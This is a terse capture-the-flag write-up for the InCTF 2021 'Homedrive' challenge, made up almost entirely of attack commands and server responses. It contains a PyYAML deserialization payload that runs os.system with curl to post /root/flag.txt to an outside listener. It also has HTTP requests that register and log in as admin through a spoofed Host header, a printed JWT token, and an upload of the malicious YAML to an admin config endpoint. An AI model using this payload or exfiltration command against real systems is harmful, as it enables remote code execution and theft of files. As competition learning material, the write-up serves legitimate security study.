CTFtime.org / InCTF 2021 / Homedrive / Writeup

Short writeup per now. will update later

create yaml file
`!python/object/apply:os.system ["curl 172.30.0.14:1337 -d @/root/flag.txt"]`
```
http POST http://172.30.0.8:5000/register Host:manager.home.drive username=admin [email protected] password=admin
HTTP/1.0 200 OK
Content-Length: 37
Content-Type: application/json
Date: Sun, 15 Aug 2021 03:07:47 GMT
Server: Werkzeug/2.0.1 Python/3.9.6

{
"message": "New user created!"
}
```
```
http http://172.30.0.8:5000/login Host:manager.home.drive username=admin [email protected] password=admin
HTTP/1.0 200 OK
Content-Length: 277
Content-Type: application/json
Date: Sun, 15 Aug 2021 03:08:17 GMT
Server: Werkzeug/2.0.1 Python/3.9.6

{
"token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjI5MDI1NzUzfQ.oOJybJDRRR6Op53UX2K37Kgbj_wPa1wkt2NbLGlRtBbbzFrPOFSvMkjDJK-E-2W1uzHCocpZllwCevPRfET9uFdFnaYfVhMa-xrNg4oUJaxV8QdUJh5w2PymDTpM8QzEOMdPl7QTkwjZnzLb7ARDaygM6jP37vDanRzkJMBrR2Q"
}
```
```
http --path-as-is --form POST 'http://172.30.0.8:5000/admin/config' Host:manager.home.drive x-access-token:eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjI5MDI1NzUzfQ.oOJybJDRRR6Op53UX2K37Kgbj_wPa1wkt2NbLGlRtBbbzFrPOFSvMkjDJK-E-2W1uzHCocpZllwCevPRfET9uFdFnaYfVhMa-xrNg4oUJaxV8QdUJh5w2PymDTpM8QzEOMdPl7QTkwjZnzLb7ARDaygM6jP37vDanRzkJMBrR2Q [email protected]
```

Homedrive

Comments

Sign in with